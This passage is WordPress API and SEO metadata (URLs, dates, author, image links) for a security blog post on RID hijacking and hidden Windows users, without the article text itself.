Users\",\"datePublished\":\"2025-02-24T04:39:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2025\\\/02\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/\"},\"wordCount\":1839,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/graylog.org\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/RID-Hijacking.jpg.webp\",\"keywords\":[\"2025\",\"Graylog\"],\"articleSection\":[\"Graylog\",\"2025\",\"Press Release\"],\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2025\\\/02\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/\",\"url\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/\",\"name\":\"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/graylog.org\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/RID-Hijacking.jpg.webp\",\"datePublished\":\"2025-02-24T04:39:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#primaryimage\",\"url\":\"https:\\\/\\\/graylog.org\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/RID-Hijacking.jpg.webp\",\"contentUrl\":\"https:\\\/\\\/graylog.org\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/RID-Hijacking.jpg.webp\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/graylog.org\\\/post\\\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\",\"name\":\"tracylamv2\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"caption\":\"tracylamv2\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/tracylamv2\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/","og_locale":"zh_HK","og_type":"article","og_title":"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users - Version 2","og_description":"Researchers at AhnLab Security Intelligence Center (ASE [&hellip;]","og_url":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/","og_site_name":"Version 2","article_published_time":"2025-02-24T04:39:59+00:00","og_image":[{"url":"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp","type":"","width":"","height":""}],"author":"tracylamv2","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"tracylamv2","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"13 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#article","isPartOf":{"@id":"https:\/\/version-2.com\/2025\/02\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/"},"author":{"name":"tracylamv2","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365"},"headline":"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users","datePublished":"2025-02-24T04:39:59+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2025\/02\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/"},"wordCount":1839,"commentCount":0,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#primaryimage"},"thumbnailUrl":"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp","keywords":["2025","Graylog"],"articleSection":["Graylog","2025","Press Release"],"inLanguage":"zh-HK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2025\/02\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/","url":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/","name":"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#primaryimage"},"image":{"@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#primaryimage"},"thumbnailUrl":"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp","datePublished":"2025-02-24T04:39:59+00:00","breadcrumb":{"@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#primaryimage","url":"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp","contentUrl":"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp"},{"@type":"BreadcrumbList","@id":"https:\/\/graylog.org\/post\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365","name":"tracylamv2","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","caption":"tracylamv2"},"url":"https:\/\/version-2.com\/zh\/author\/tracylamv2\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-qVq","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/103504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/149011790"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=103504"}],"version-history":[{"count":4,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/103504\/revisions"}],"predecessor-version":[{"id":103508,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/103504\/revisions\/103508"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=103504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=103504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=103504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}